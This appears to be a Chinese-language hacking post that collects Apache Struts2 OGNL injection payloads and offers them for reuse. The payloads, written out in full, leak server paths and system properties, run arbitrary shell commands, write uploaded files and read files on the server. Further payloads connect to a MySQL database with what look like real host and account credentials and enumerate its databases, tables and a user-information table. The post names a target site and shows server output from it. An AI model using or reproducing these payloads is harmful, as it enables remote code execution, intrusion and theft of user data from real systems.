2010版的,其他的版本,在这个基础上修个。欢迎多爆料。

网站物理路径:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43req.getRealPath(%22\u005c%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

java.版本:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

os.name:

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

os.arch

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

os.version

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

user.name

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))

user.home

网站物理路径:

java.home: \43req.getRealPath(%22\u005c%22)

java.version: @java.lang.System@getProperty(%22java.version%22)

os.name: @java.lang.System@getProperty(%22os.name%22)

os.arch: @java.lang.System@getProperty(%22os.arch%22)

os.version: @java.lang.System@getProperty(%22os.version%22)

user.name: @java.lang.System@getProperty(%22user.name%22)

user.home: /usr/share/jbossas

user.dir: /var/lib/jbossas/bin

java.class.version: 49.0

java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar

java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64

file.separator: /

path.separator: :

java.vendor: Sun Microsystems Inc.

java.vendor.url: http://java.sun.com/

java.vm.specification.version: 1.0

java.vm.specification.vendor: Sun Microsystems Inc.

java.vm.specification.name: Java Virtual Machine Specification

java.vm.version: 1.5.0_13-b05

java.vm.vendor: Sun Microsystems Inc.

java.vm.name: Java HotSpot(TM) 64-Bit Server VM

java.specification.version: 1.5

java.specification.vender:

java.specification.name: Java Platform API Specification

java.io.tmpdir: /tmp

执行CMD

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=ls+-la

http://www.quam.net/index.action?request_locale=zh_TW&

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt

上传文件数据包

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))

POST

t=neirong&path=%2Ftmp%2Fhsmw.txt

修改POST版加&即可。

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))

&t=neirong&path=%2Ftmp%2Fhsmw.txt

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43fos\75new\40java.io.FileOutputStream(\43req.getParameter(%22path%22))')(d))&(i3)(('\43fos.write(\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\43fos.close()')(d))

&t=neirong&path=/tmp/hsmw.txt

列目录

返回值(true)判断读取 @java.io.File@listRoots()[0].isDirectory()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))

目录数 @java.io.File@listRoots().length

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))

第一个数组 @java.io.File@listRoots()[0])

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('\43xman.getWriter().close()')(d))

数组返回值 @java.io.File@listRoots()[0].listFiles().length

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('\43xman.getWriter().close()')(d))

第一个 @java.io.File@listRoots()[0].listFiles()[0].getName()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))

第2个  @java.io.File@listRoots()[0].listFiles()[1].getName()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('\43xman.getWriter().close()')(d))

如何判断文件 返回值(false) @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('\43xman.getWriter().close()')(d))

判断文件大小 @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('\43xman.getWriter().close()')(d))

输出文件内容

@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22])

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))

@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7])

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i1)(('\43dis\75new\40java.io.DataInputStream(new\40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('\43dos\75new\40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('\43buff\75new\40byte[102400]')(d))&(i4)(('\43dis.skipBytes(0)')(d))&(i5)(('\43size\75\43dis.read(\43buff)')(d))&(i6)(('\43dis.close()')(d))&(i7)(('\43dos.writeInt(\43size)')(d))&(i95)(('\43dos.write(\43buff\u002c0\u002c\43size)')(d))&(i99)(('\43dos.close()')(d))

—数据库操作—

rs.absolute(1) 为第1个数据库

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) 为第2个数据库

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getCatalogs()')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(1))')(d))&(i99)(('\43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

以此类推,访问数值为空,停止。数据库连接格式比较

&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

&psw=密码&user=账号&clazz=数据库类型&url=数据库URL(注意URL编码)

------

数据库(表查询)在原来的语句中,多出一个 &db=数据库名

rs.absolute(1) 为第1个表

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(1)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) 为第2个表

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getTables(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c%22%25%22\u002cnew\40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('\43rs.absolute(2)')(d))&&(i95)(('\43xman.getWriter().println(\43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

------

数据库(字段查询)在原来的语句中,多出一个 &table=表

rs.absolute(1)为第1个字段

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(1)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2)为第2个字段

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i5)(('\43rs\75\43con.getMetaData().getColumns(\43req.getParameter(%22db%22)\u002c%22%25%22\u002c\43req.getParameter(%22table%22)\u002c%22%25%22)')(d))&(i6)(('\43rs.absolute(2)')(d))&(i95)(('\43xman.getWriter().println(\43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

-----

数据库(执行SQL语句)在原来的语句中,多出一个 &sql=select+count%28*%29+from+userinfos

!这里GET 的数据!POST 木有,怪了。

计算查询的字段数 (例子1)

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

计算查询的字段数 (例子2)返回值8,就是8个字段

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(\43rs.getMetaData().getColumnCount())')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

确定8以后,rs.getMetaData().getColumnName(1) 然后 rs.getMetaData().getColumnName(2) 类推8个字段。

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(\43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

输出内容 用rs.next(),第一条内容,是rs.next()

